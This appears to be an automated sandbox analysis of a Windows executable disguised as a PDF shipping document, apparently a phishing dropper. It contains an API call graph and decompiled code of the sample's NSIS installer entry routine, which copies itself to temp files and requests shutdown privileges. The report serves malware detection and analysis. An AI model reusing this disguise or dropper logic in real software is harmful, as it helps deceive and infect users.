5837->5838 5839 401423 24 API calls 5838->5839 5840 401f3a 5839->5840 5847 405b2d ShellExecuteExW 5840->5847 5842 401f82 5843 40292e 5842->5843 5848 40697f WaitForSingleObject 5842->5848 5845 401f9f CloseHandle 5845->5843 5847->5842 5849 406999 5848->5849 5850 4069ab GetExitCodeProcess 5849->5850 5851 406910 2 API calls 5849->5851 5850->5845 5852 4069a0 WaitForSingleObject 5851->5852 5852->5849 4749 6eac2a7f 4750 6eac2acf 4749->4750 4751 6eac2a8f VirtualProtect 4749->4751 4751->4750 5853 402f93 5854 402fa5 SetTimer 5853->5854 5855 402fbe 5853->5855 5854->5855 5856 403013 5855->5856 5857 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5855->5857 5857->5856 5858 6eac1979 5860 6eac199c 5858->5860 5859 6eac19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5862 6eac1312 2 API calls 5859->5862 5860->5859 5861 6eac19d1 GlobalFree 5860->5861 5861->5859 5863 6eac1b6e GlobalFree GlobalFree 5862->5863 5864 401d17 5865 402d84 17 API calls 5864->5865 5866 401d1d IsWindow 5865->5866 5867 401a20 5866->5867 5868 6eac1774 5869 6eac17a3 5868->5869 5870 6eac1bff 22 API calls 5869->5870 5871 6eac17aa 5870->5871 5872 6eac17bd 5871->5872 5873 6eac17b1 5871->5873 5875 6eac17e4 5872->5875 5876 6eac17c7 5872->5876 5874 6eac1312 2 API calls 5873->5874 5880 6eac17bb 5874->5880 5878 6eac180e 5875->5878 5879 6eac17ea 5875->5879 5877 6eac15dd 3 API calls 5876->5877 5881 6eac17cc 5877->5881 5883 6eac15dd 3 API calls 5878->5883 5882 6eac1654 3 API calls 5879->5882 5884 6eac1654 3 API calls 5881->5884 5885 6eac17ef 5882->5885 5883->5880 5886 6eac17d2 5884->5886 5887 6eac1312 2 API calls 5885->5887 5888 6eac1312 2 API calls 5886->5888 5889 6eac17f5 GlobalFree 5887->5889 5890 6eac17d8 GlobalFree 5888->5890 5889->5880 5891 6eac1809 GlobalFree 5889->5891 5890->5880 5891->5880 5892 404599 lstrcpynW lstrlenW 5224 401b9b 5225 401ba8 5224->5225 5226 401bec 5224->5226 5227 401c31 5225->5227 5232 401bbf 5225->5232 5228 401bf1 5226->5228 5229 401c16 GlobalAlloc 5226->5229 5231 406544 17 API calls 5227->5231 5238 40239d 5227->5238 5228->5238 5245 406507 lstrcpynW 5228->5245 5230 406544 17 API calls 5229->5230 5230->5227 5233 402397 5231->5233 5243 406507 lstrcpynW 5232->5243 5233->5238 5239 405b67 MessageBoxIndirectW 5233->5239 5236 401c03 GlobalFree 5236->5238 5237 401bce 5244 406507 lstrcpynW 5237->5244 5239->5238 5241 401bdd 5246 406507 lstrcpynW 5241->5246 5243->5237 5244->5241 5245->5236 5246->5238 5893 40261c 5894 402da6 17 API calls 5893->5894 5895 402623 5894->5895 5898 405ff7 GetFileAttributesW CreateFileW 5895->5898 5897 40262f 5898->5897 5261 40259e 5262 402de6 17 API calls 5261->5262 5263 4025a8 5262->5263 5264 402d84 17 API calls 5263->5264 5265 4025b1 5264->5265 5266 4025c0 5265->5266 5271 40292e 5265->5271 5267 4025d9 RegEnumValueW 5266->5267 5268 4025cd RegEnumKeyW 5266->5268 5269 4025f5 RegCloseKey 5267->5269 5270 4025ee 5267->5270 5268->5269 5269->5271 5270->5269 5906 40149e 5907 4014ac PostQuitMessage 5906->5907 5908 40239d 5906->5908 5907->5908 5909 404622 5911 40463a 5909->5911 5912 404754 5909->5912 5910 4047be 5913 404888 5910->5913 5914 4047c8 GetDlgItem 5910->5914 5915 404463 18 API calls 5911->5915 5912->5910 5912->5913 5918 40478f GetDlgItem SendMessageW 5912->5918 5920 4044ca 8 API calls 5913->5920 5916 4047e2 5914->5916 5917 404849 5914->5917 5919 4046a1 5915->5919 5916->5917 5925 404808 SendMessageW LoadCursorW SetCursor 5916->5925 5917->5913 5921 40485b 5917->5921 5942 404485 KiUserCallbackDispatcher 5918->5942 5923 404463 18 API calls 5919->5923 5924 404883 5920->5924 5927 404871 5921->5927 5928 404861 SendMessageW 5921->5928 5930 4046ae CheckDlgButton 5923->5930 5943 4048d1 5925->5943 5927->5924 5932 404877 SendMessageW 5927->5932 5928->5927 5929 4047b9 5933 4048ad SendMessageW 5929->5933 5940 404485 KiUserCallbackDispatcher 5930->5940 5932->5924 5933->5910 5935 4046cc GetDlgItem 5941 404498 SendMessageW 5935->5941 5937 4046e2 SendMessageW 5938 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5937->5938 5939 4046ff GetSysColor 5937->5939 5938->5924 5939->5938 5940->5935 5941->5937 5942->5929 5946 405b2d ShellExecuteExW 5943->5946 5945 404837 LoadCursorW SetCursor 5945->5917 5946->5945 5947 4015a3 5948 402da6 17 API calls 5947->5948 5949 4015aa SetFileAttributesW 5948->5949 5950 4015bc 5949->5950 5951 401fa4 5952 402da6 17 API calls 5951->5952 5953 401faa 5952->5953 5954 405569 24 API calls 5953->5954 5955 401fb4 5954->5955 5956 405aea 2 API calls 5955->5956 5957 401fba 5956->5957 5958 401fdd CloseHandle 5957->5958 5959 40697f 5 API calls 5957->5959 5962 40292e 5957->5962 5958->5962 5961 401fcf 5959->5961 5961->5958 5964 40644e wsprintfW 5961->5964 5964->5958 4558 4056a8 4559 405852 4558->4559 4560 4056c9 GetDlgItem GetDlgItem GetDlgItem 4558->4560 4562 405883 4559->4562 4563 40585b GetDlgItem CreateThread FindCloseChangeNotification 4559->4563 4604 404498 SendMessageW 4560->4604 4565 4058ae 4562->4565 4566 4058d3 4562->4566 4567 40589a ShowWindow ShowWindow 4562->4567 4563->4562 4607 40563c OleInitialize 4563->4607 4564 405739 4570 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4564->4570 4568 4058ba 4565->4568 4569 40590e 4565->4569 4574 4044ca 8 API calls 4566->4574 4606 404498 SendMessageW 4567->4606 4572 4058c2 4568->4572 4573 4058e8 ShowWindow 4568->4573 4569->4566 4579 40591c SendMessageW 4569->4579 4577 405792 SendMessageW SendMessageW 4570->4577 4578 4057ae 4570->4578 4580 40443c SendMessageW 4572->4580 4575 405908 4573->4575 4576 4058fa 4573->4576 4581 4058e1 4574->4581 4583 40443c SendMessageW 4575->4583 4582 405569 24 API calls 4576->4582 4577->4578 4584 4057c1 4578->4584 4585 4057b3 SendMessageW 4578->4585 4579->4581 4586 405935 CreatePopupMenu 4579->4586 4580->4566 4582->4575 4583->4569 4588 404463 18 API calls 4584->4588 4585->4584 4587 406544 17 API calls 4586->4587 4589 405945 AppendMenuW 4587->4589 4590 4057d1 4588->4590 4591 405962 GetWindowRect 4589->4591 4592 405975 TrackPopupMenu 4589->4592 4593 4057da ShowWindow 4590->4593 4594 40580e GetDlgItem SendMessageW 4590->4594 4591->4592 4592->4581 4596 405990 4592->4596 4597 4057f0 ShowWindow 4593->4597 4598 4057fd 4593->4598 4594->4581 4595 405835 SendMessageW SendMessageW 4594->4595 4595->4581 4599 4059ac SendMessageW 4596->4599 4597->4598 4605 404498 SendMessageW 4598->4605 4599->4599 4600 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4599->4600 4602 4059ee SendMessageW 4600->4602 4602->4602 4603 405a17 GlobalUnlock SetClipboardData CloseClipboard 4602->4603 4603->4581 4604->4564 4605->4594 4606->4565 4608 4044af SendMessageW 4607->4608 4609 40565f 4608->4609 4612 401389 2 API calls 4609->4612 4613 405686 4609->4613 4610 4044af SendMessageW 4611 405698 OleUninitialize 4610->4611 4612->4609 4613->4610 4614 40252a 4625 402de6 4614->4625 4617 402da6 17 API calls 4618 40253d 4617->4618 4619 402548 RegQueryValueExW 4618->4619 4620 40292e 4618->4620 4621 402568 4619->4621 4624 40256e RegCloseKey 4619->4624 4621->4624 4630 40644e wsprintfW 4621->4630 4624->4620 4626 402da6 17 API calls 4625->4626 4627 402dfd 4626->4627 4628 406374 RegOpenKeyExW 4627->4628 4629 402534 4628->4629 4629->4617 4630->4624 5965 40202a 5966 402da6 17 API calls 5965->5966 5967 402031 5966->5967 5968 4068d4 5 API calls 5967->5968 5969 402040 5968->5969 5970 40205c GlobalAlloc 5969->5970 5973 4020cc 5969->5973 5971 402070 5970->5971 5970->5973 5972 4068d4 5 API calls 5971->5972 5974 402077 5972->5974 5975 4068d4 5 API calls 5974->5975 5976 402081 5975->5976 5976->5973 5980 40644e wsprintfW 5976->5980 5978 4020ba 5981 40644e wsprintfW 5978->5981 5980->5978 5981->5973 5982 404caa 5983 404cd6 5982->5983 5984 404cba 5982->5984 5985 404d09 5983->5985 5986 404cdc SHGetPathFromIDListW 5983->5986 5993 405b4b GetDlgItemTextW 5984->5993 5988 404cec 5986->5988 5992 404cf3 SendMessageW 5986->5992 5990 40140b 2 API calls 5988->5990 5989 404cc7 SendMessageW 5989->5983 5990->5992 5992->5985 5993->5989 5994 4021aa 5995 402da6 17 API calls 5994->5995 5996 4021b1 5995->5996 5997 402da6 17 API calls 5996->5997 5998 4021bb 5997->5998 5999 402da6 17 API calls 5998->5999 6000 4021c5 5999->6000 6001 402da6 17 API calls 6000->6001 6002 4021cf 6001->6002 6003 402da6 17 API calls 6002->6003 6004 4021d9 6003->6004 6005 402218 CoCreateInstance 6004->6005 6006 402da6 17 API calls 6004->6006 6008 402237 6005->6008 6006->6005 6007 401423 24 API calls 6009 4022f6 6007->6009 6008->6007 6008->6009 6010 6eac2d43 6011 6eac2d5b 6010->6011 6012 6eac162f 2 API calls 6011->6012 6013 6eac2d76 6012->6013 6014 401a30 6015 402da6 17 API calls 6014->6015 6016 401a39 ExpandEnvironmentStringsW 6015->6016 6017 401a4d 6016->6017 6019 401a60 6016->6019 6018 401a52 lstrcmpW 6017->6018 6017->6019 6018->6019 6025 4023b2 6026 4023c0 6025->6026 6027 4023ba 6025->6027 6028 4023ce 6026->6028 6030 402da6 17 API calls 6026->6030 6029 402da6 17 API calls 6027->6029 6031 4023dc 6028->6031 6032 402da6 17 API calls 6028->6032 6029->6026 6030->6028 6033 402da6 17 API calls 6031->6033 6032->6031 6034 4023e5 WritePrivateProfileStringW 6033->6034 4752 402434 4753 402467 4752->4753 4754 40243c 4752->4754 4755 402da6 17 API calls 4753->4755 4756 402de6 17 API calls 4754->4756 4757 40246e 4755->4757 4758 402443 4756->4758 4764 402e64 4757->4764 4760 40244d 4758->4760 4761 40247b 4758->4761 4762 402da6 17 API calls 4760->4762 4763 402454 RegDeleteValueW RegCloseKey 4762->4763 4763->4761 4765 402e78 4764->4765 4766 402e71 4764->4766 4765->4766 4768 402ea9 4765->4768 4766->4761 4769 406374 RegOpenKeyExW 4768->4769 4770 402ed7 4769->4770 4771 402ee7 RegEnumValueW 4770->4771 4778 402f81 4770->4778 4780 402f0a 4770->4780 4772 402f71 RegCloseKey 4771->4772 4771->4780 4772->4778 4773 402f46 RegEnumKeyW 4774 402f4f RegCloseKey 4773->4774 4773->4780 4775 4068d4 5 API calls 4774->4775 4776 402f5f 4775->4776 4776->4778 4779 402f63 RegDeleteKeyW 4776->4779 4777 402ea9 6 API calls 4777->4780 4778->4766 4779->4778 4780->4772 4780->4773 4780->4774 4780->4777 6049 6eac1058 6051 6eac1074 6049->6051 6050 6eac10dd 6051->6050 6052 6eac15b6 GlobalFree 6051->6052 6053 6eac1092 6051->6053 6052->6053 6054 6eac15b6 GlobalFree 6053->6054 6055 6eac10a2 6054->6055 6056 6eac10a9 GlobalSize 6055->6056 6057 6eac10b2 6055->6057 6056->6057 6058 6eac10c7 6057->6058 6059 6eac10b6 GlobalAlloc 6057->6059 6061 6eac10d2 GlobalFree 6058->6061 6060 6eac15dd 3 API calls 6059->6060 6060->6058 6061->6050 4781 401735 4782 402da6 17 API calls 4781->4782 4783 40173c SearchPathW 4782->4783 4784 401757 4783->4784 6062 401d38 6063 402d84 17 API calls 6062->6063 6064 401d3f 6063->6064 6065 402d84 17 API calls 6064->6065 6066 401d4b GetDlgItem 6065->6066 6067 402638 6066->6067 6068 4014b8 6069 4014be 6068->6069 6070 401389 2 API calls 6069->6070 6071 4014c6 6070->6071 6079 40263e 6080 402652 6079->6080 6081 40266d 6079->6081 6082 402d84 17 API calls 6080->6082 6083 402672 6081->6083 6084 40269d 6081->6084 6093 402659 6082->6093 6086 402da6 17 API calls 6083->6086 6085 402da6 17 API calls 6084->6085 6087 4026a4 lstrlenW 6085->6087 6088 402679 6086->6088 6087->6093 6096 406529 WideCharToMultiByte 6088->6096 6090 40268d lstrlenA 6090->6093 6091 4026d1 6092 4026e7 6091->6092 6094 4060a9 WriteFile 6091->6094 6093->6091 6093->6092 6095 4060d8 5 API calls 6093->6095 6094->6092 6095->6091 6096->6090

                                                Executed Functions

                                                Function 004034F7 Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450stringfilecomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4034f7-403547 SetErrorMode GetVersionExW 1 403581-403588 0->1 2 403549-40357d GetVersionExW 0->2 3 403592-4035d2 1->3 4 40358a 1->4 2->1 5 4035d4-4035dc call 4068d4 3->5 6 4035e5 3->6 4->3 5->6 11 4035de 5->11 8 4035ea-4035fe call 406864 lstrlenA 6->8 13 403600-40361c call 4068d4 * 3 8->13 11->6 20 40362d-40368f #17 OleInitialize SHGetFileInfoW call 406507 GetCommandLineW call 406507 13->20 21 40361e-403624 13->21 28 403691-403693 20->28 29 403698-4036ab call 405e03 CharNextW 20->29 21->20 25 403626 21->25 25->20 28->29 32 4037a2-4037a8 29->32 33 4036b0-4036b6 32->33 34 4037ae 32->34 35 4036b8-4036bd 33->35 36 4036bf-4036c5 33->36 37 4037c2-4037dc GetTempPathW call 4034c6 34->37 35->35 35->36 38 4036c7-4036cb 36->38 39 4036cc-4036d0 36->39 47 403834-40384c DeleteFileW call 40307d 37->47 48 4037de-4037fc GetWindowsDirectoryW lstrcatW call 4034c6 37->48 38->39 41 403790-40379e call 405e03 39->41 42 4036d6-4036dc 39->42 41->32 59 4037a0-4037a1 41->59 45 4036f6-40372f 42->45 46 4036de-4036e5 42->46 54 403731-403736 45->54 55 40374b-403785 45->55 52 4036e7-4036ea 46->52 53 4036ec 46->53 64 403852-403858 47->64 65 403a23-403a31 call 403adc OleUninitialize 47->65 48->47 62 4037fe-40382e GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034c6 48->62 52->45 52->53 53->45 54->55 61 403738-403740 54->61 57 403787-40378b 55->57 58 40378d-40378f 55->58 57->58 63 4037b0-4037bd call 406507 57->63 58->41 59->32 66 403742-403745 61->66 67 403747 61->67 62->47 62->65 63->37 69 40385e-403871 call 405e03 64->69 70 4038ff-403906 call 403bb6 64->70 77 403a33-403a42 call 405b67 ExitProcess 65->77 78 403a48-403a4e 65->78 66->55 66->67 67->55 84 4038c3-4038d0 69->84 85 403873-4038a8 69->85 80 40390b-40390e 70->80 82 403a50-403a65 GetCurrentProcess OpenProcessToken 78->82 83 403ac6-403ace 78->83 80->65 91 403a96-403aa4 call 4068d4 82->91 92 403a67-403a90 LookupPrivilegeValueW AdjustTokenPrivileges 82->92 86 403ad0 83->86 87 403ad3-403ad6 ExitProcess 83->87 88 4038d2-4038e0 call 405ede 84->88 89 403913-403927 call 405ad2 lstrcatW 84->89 93 4038aa-4038ae 85->93 86->87 88->65 105 4038e6-4038fc call 406507 * 2 88->105 103 403934-40394e lstrcatW lstrcmpiW 89->103 104 403929-40392f lstrcatW 89->104 106 403ab2-403abd ExitWindowsEx 91->106 107 403aa6-403ab0 91->107 92->91 97 4038b0-4038b5 93->97 98 4038b7-4038bf 93->98 97->98 99 4038c1 97->99 98->93 98->99 99->84 108 403a21 103->108 109 403954-403957 103->109 104->103 105->70 106->83 111 403abf-403ac1 call 40140b 106->111 107->106 107->111 108->65 112 403960 call 405ab5 109->112 113 403959-40395e call 405a38 109->113 111->83 121 403965-403975 SetCurrentDirectoryW 112->121 113->121 123 403982-4039ae call 406507 121->123 124 403977-40397d call 406507 121->124 128 4039b3-4039ce call 406544 DeleteFileW 123->128 124->123 131 4039d0-4039e0 CopyFileW 128->131 132 403a0e-403a18 128->132 131->132 133 4039e2-403a02 call 4062c7 call 406544 call 405aea 131->133 132->128 134 403a1a-403a1c call 4062c7 132->134 133->132 142 403a04-403a0b CloseHandle 133->142 134->108 142->132
                                                C-Code - Quality: 79%
                                                			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a2d8 = _v324.dwBuildNumber;
				 *0x42a2dc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a2de != 0x600) {
					_t180 = E004068D4(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E00406864(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E004068D4(0xb);
				 *0x42a224 = E004068D4(9);
				_t88 = E004068D4(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a2dc =  *0x42a2dc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a2e0 = _t88;
				SHGetFileInfoW(0x4216c8, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406507(0x429220, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe\" ";
				E00406507(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x42a220 = 0x400000;
				_t251 = L"\"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00435002;
				}
				_t199 = CharNextW(E00405E03(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E03(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406507(L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen", _t199);
										L37:
										_t235 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034C6(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403ADC();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2b4 == _t189) {
														L77:
														_t120 =  *0x42a2cc;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E004068D4(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B67(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a23c == _t189) {
												L51:
												 *0x42a2cc =  *0x42a2cc | 0xffffffff;
												_v24 = E00403BB6(_t265);
												goto L68;
											}
											_t219 = E00405E03(L"\"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe\" ") {
													_t190 = E00405AD2(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\hardz\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\hardz\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AB5();
														} else {
															E00405A38();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen"; // 0x43
														if(__eflags == 0) {
															E00406507(L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen", _t220);
														}
														E00406507(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x120)));
															DeleteFileW(0x420ec8);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe", 0x420ec8, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062C7(_t202, 0x420ec8, 0);
																	E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x124)));
																	_t153 = E00405AEA(0x420ec8);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062C7(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405EDE(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406507(L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen", _t222);
												E00406507(L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\hardz\\Desktop\\Original Shipment_Document.PDF.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034C6(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034C6(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a2c0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}



















































                                                0x00403505
                                                0x00403506
                                                0x0040350d
                                                0x00403510
                                                0x00403517
                                                0x0040351a
                                                0x0040352d
                                                0x00403533
                                                0x00403536
                                                0x00403539
                                                0x00403547
                                                0x0040354f
                                                0x0040355a
                                                0x00403573
                                                0x00403575
                                                0x0040357d
                                                0x0040357d
                                                0x00403588
                                                0x0040358a
                                                0x0040358a
                                                0x0040359f
                                                0x004035c4
                                                0x004035d2
                                                0x004035d5
                                                0x004035dc
                                                0x004035e3
                                                0x004035e3
                                                0x004035dc
                                                0x004035e5
                                                0x004035ea
                                                0x004035eb
                                                0x004035f7
                                                0x004035fb
                                                0x00403602
                                                0x00403610
                                                0x00403615
                                                0x0040361c
                                                0x00403620
                                                0x00403624
                                                0x00403626
                                                0x00403626
                                                0x00403624
                                                0x0040362d
                                                0x00403634
                                                0x0040363a
                                                0x00403652
                                                0x00403662
                                                0x00403667
                                                0x0040366d
                                                0x00403674
                                                0x0040367b
                                                0x0040367d
                                                0x0040367e
                                                0x00403688
                                                0x0040368f
                                                0x00403691
                                                0x00403693
                                                0x00403693
                                                0x004036a6
                                                0x004036a8
                                                0x004037a2
                                                0x004037a2
                                                0x004037a5
                                                0x004037a8
                                                0x00000000
                                                0x00000000
                                                0x004036b2
                                                0x004036b3
                                                0x004036b6
                                                0x004036bf
                                                0x004036bf
                                                0x004036c2
                                                0x004036c5
                                                0x004036c8
                                                0x004036cb
                                                0x004036cb
                                                0x004036cb
                                                0x004036cc
                                                0x004036d0
                                                0x00403790
                                                0x00403799
                                                0x0040379b
                                                0x0040379e
                                                0x004037a1
                                                0x004037a1
                                                0x004037a1
                                                0x00000000
                                                0x004036d6
